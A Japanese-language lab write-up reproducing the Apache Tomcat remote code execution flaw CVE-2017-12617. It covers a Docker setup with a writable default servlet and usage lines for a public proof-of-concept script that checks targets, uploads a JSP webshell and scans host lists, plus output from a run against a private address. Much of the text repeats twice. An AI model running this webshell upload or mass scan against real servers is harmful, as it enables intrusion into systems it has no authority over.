CVE-2017-12617脆弱性分析
3050 ワード
CVE-2017-12617
Apache Tomcatチームは10月3日、デフォルトservletが構成されている場合、9.0.1(Beta)、8.5.23、8.0.47、7.0.82までのすべてのTomcatバージョンにすべてのオペレーティングシステム上の潜在的な危険なリモート実行コード(RCE)脆弱性が含まれていると発表した.CVE-2017-12617:リモートコード実行脆弱性.
環境
image:tomcat:7.0.79-jre 8を使用して脆弱性を再現
修正\conf\web.xmlプロファイル、readonlyをfalseに設定するには、tomcatサービスを再起動することを忘れないでください.毎回データをインポートしないように、マウント方式で永続化し、修正が必要なwebを採用します.xml定義は./ディレクトリ、コンテナ指定ディレクトリにマウントvolumes:-./web.xml:/usr/local/tomcat/conf/web.xml
poc
./cve-2017-12617.py [options]
options:
-u ,–url [::] check target url if it’s vulnerable -p,–pwn [::] generate webshell and upload it -l,–list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1 ./cve-2017-12617.py –url http://127.0.0.1 ./cve-2017-12617.py -u http://127.0.0.1 -p pwn ./cve-2017-12617.py –url http://127.0.0.1 -pwn pwn ./cve-2017-12617.py -l hotsts.txt ./cve-2017-12617.py –list hosts.txt
リファレンス
*http://www.freebuf.com/vuls/150203.html
Apache Tomcatチームは10月3日、デフォルトservletが構成されている場合、9.0.1(Beta)、8.5.23、8.0.47、7.0.82までのすべてのTomcatバージョンにすべてのオペレーティングシステム上の潜在的な危険なリモート実行コード(RCE)脆弱性が含まれていると発表した.CVE-2017-12617:リモートコード実行脆弱性.
環境
image:tomcat:7.0.79-jre 8を使用して脆弱性を再現
docker-compose up -d
修正\conf\web.xmlプロファイル、readonlyをfalseに設定するには、tomcatサービスを再起動することを忘れないでください.毎回データをインポートしないように、マウント方式で永続化し、修正が必要なwebを採用します.xml定義は./ディレクトリ、コンテナ指定ディレクトリにマウントvolumes:-./web.xml:/usr/local/tomcat/conf/web.xml
poc
./cve-2017-12617.py [options]
options:
-u ,–url [::] check target url if it’s vulnerable -p,–pwn [::] generate webshell and upload it -l,–list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1 ./cve-2017-12617.py –url http://127.0.0.1 ./cve-2017-12617.py -u http://127.0.0.1 -p pwn ./cve-2017-12617.py –url http://127.0.0.1 -pwn pwn ./cve-2017-12617.py -l hotsts.txt ./cve-2017-12617.py –list hosts.txt
python tomcat-cve-2017-12617.py -u http://10.160.11.191:8080
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
Poc Filename Poc.jsp
File Created ..
http://10.160.11.191:8080 it's Vulnerable to CVE-2017-12617
http://10.160.11.191:8080/Poc.jsp
リファレンス
*http://www.freebuf.com/vuls/150203.html